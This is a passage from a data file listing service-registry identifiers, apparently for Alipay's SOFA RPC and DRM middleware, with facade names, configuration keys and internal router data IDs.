EFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.battle.downgradableWealthGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.darwin.common.service.facade.api.dart.ExperimentDartMetricReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulescanner.core.service.FinmngQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.amspm.ardd.common.drm.RulePushDrmResource.rulePageSizeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeUctLogStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:opsconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.job.StepFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dayuarkbase.facade.DayuArkService:1.0:400001@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.IdCrontabRunRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antmember.common.service.facade.grade.MemberQuickUpgradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.service.facade.smart.SmartSwitchLeftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_GLOBALPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.252.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zhub.core.integration.fc.CertifycoreServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.securityprodmng.SecuritySceneConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:http://39.107.25.131:5000/@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.routePaycoreConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.bd.BdOpportunityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.checkUriWithFormated,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.RegionStatusSwitch.forbiddenTenantsForLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mshopprod.common.service.brand.api.BrandShopUpgradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_capitalRansomCallBack3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.FaqFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.JobDefAPIService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.message.MiniAppMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dayutrprod.common.facade.monitor.DayuRiskEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryNewAccItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloaninsight.biz.shared.robot.RobotManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FundInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.FenceOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_G_RISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finmobilemarket.common.service.facade.api.SecuInfoReadTimeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelpredict.biz.service.impl.common.ModelRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_O_LINKE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.44.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileappcommon.common.service.facade.baas.BundleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.decision.facade.FdUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.ServerPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.payee.PayeeReadNewServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainbankloan.facade.api.query.CreditQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileops.common.service.facade.AlarmAnalysisFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceTryCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.comment.CommentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicCiQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_repository_supportRepositoryGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ignetcontrol.service.facade.MemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsEmployeeAccountCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.SeasonInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.product.ProductSpecDateStockQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gfsettle.facade.api.SettleAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.voucherprod.facade.api.asset.AssetOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bic.common.service.facade.wearable.api.MobileBiometricManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-meshycommander-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmRiskAssessmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.spi.RobotCallBackSPI:1.0:pfunddts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.PolicyProcessFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.facade.OperationRecordOpenApiFacade:1.0:ischedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtProdToolManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.reindeer.TemplateManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.opencore.service.facade.spi.SpiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:excashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.severless.facade.spi.SpiBenefitConfManageFacade:1.0:alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodeRouteWriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.aec.MacAecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:aliinvoiceprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kacrm.industry.PerfermanceTeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.178.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.groot:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.loadSimilarSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_CIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.darwin.common.service.facade.api.MetricAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktMissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.CcMoveRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imtmsvcprod.common.service.facade.edu.SchoolRollServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.134.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CifQueryParamSwitchConfig.controlCodesStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.goods.GoodsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gftms.facade.api.basic.cashallocation.CashAllocationPaymentOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.facade.service.AtomicZDocService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msgopprod.common.service.facade.marketing.MarketingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.26.184#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.common.service.facade.workbench.ProvinceCityInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.ruleinference.RuleInferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.YebEventParamQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.usertask.facade.UserTaskService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mobiletms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliapy.boot.test.sofarpc.starter.demo.ConfigDemoService:1.0:service-tr3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.32.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tradequote.api.FundNetValueQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfinvoice.facade.invoice.InvoiceAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.52.96.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_O_PROCESSMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.132.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.63.178.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MRCHSELFOP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.RiskReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.DataCollectionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.promocore.common.service.facade.CampConsultiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchiswisdom.eventbus.api.EventAdaptorsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.monitor.ScheduleMonitorApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.channel.PublicInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.shared.manager.drm.MbaasDRMImpl.gzipAndBase64SwitchDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditAmountChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.api.ExposureManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.preCalcDirtyProtocols,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:airprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.shangshu.dtimageprod.common.service.facade.service.DtImageProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.UserInfoValidateConfig.residenceSupportConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dataprofiling.common.service.facade.DistributionCollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.rcportal.common.service.facade.lcopr.LegalOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanTaskShared.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fundprod.common.service.facade.product.query.PortfolioQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mitemcenter.common.service.facade.backend.api.BackgroundRtDstCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.MrpcSuggestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finassetbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoguard.facade.scene.api.SceneDefaultConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.order.DeviceApplyOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.displayImportantNoteMixdirect,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbcateringorder.common.service.facade.api.morder.DinningCartFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.crowd.CrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.biz.flow.manager.EinvInvoiceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.loan.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.openBankRedirectUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.antforest:name=com.alipay.antforest.core.drd.container.loaders.DrmConfigLoader.viewUpsert,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.cash.BankCashForecastTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.d3227aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vegameta.common.service.facade.event.SyncEventQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.biz.shared.punish.PunishService:1.0:generalDecisionPunishService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelRiskMonitoringTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.CertificateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SysConfigManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.productInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finbatch.pcconfigread.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcore.common.service.facade.kbjob.JobBizConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimprod.common.service.InsClaimOssAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.merchantgrowth.membercard.MemberCardConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.163.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcontent.common.service.facade.api.shop.ContentShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:quoteTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.163.192#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acccenter.common.service.facade.ProductUspFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_IMOBILEWP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.bluearmyprod.core.service.drm.DBConfigDRMConfig.dbConfigJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.channel.spi.ChannelValidateProductCheckService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.OrgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.248.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.api.account.CfpMidAccountVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@adsensor#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.datacontext.common.service.facade.bizcontext.api.FcBizContextQueryService:1.0:fcbizcontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.searchportal.biz.shared.demeter.manager.AppManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.cashing.facade.CashingRecordQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.cache.CacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CATERING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.linke.aci.core.facade.CIJobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.bizservice.facade.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bkpromofront.facade.packageplay.api.PackagePlayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pricecore.common.service.facade.BenchmarkIntRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.dom.DomQueryManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:officefinalsff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sts.service.facacde.SecurityScanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cifin.cifinDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebEteMftransQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cap.common.service.tenant.CapTenantService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rccenter.common.service.facade.RcHgSurveillanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.product.FinProductKvStaticInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.CqcBranchRuleQueryFacade:1.0:bbcmngService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.zpaas_local_slave_ds_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.inviteToAnswerCardConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradequery.common.service.facade.TradeChargeQueryFacade:1.0:tradequeryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airmng.common.service.facade.whitelist.LimitAccountWhiteListService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.cds.facade.CdsDynamicResourceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.equity.search.CampTriggerCountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.xiaobao.interaction.InteractionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openpunish.facade.callback.PunishmentActionCallback:1.0:openhome.punishmentActionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:nvwaCoinMergeProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.activity.ActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.244.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.initRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ifundcontrolmodel.core.service.physicaltransactionfund.FundCapabilityModelPatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.phytable.PhyTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.a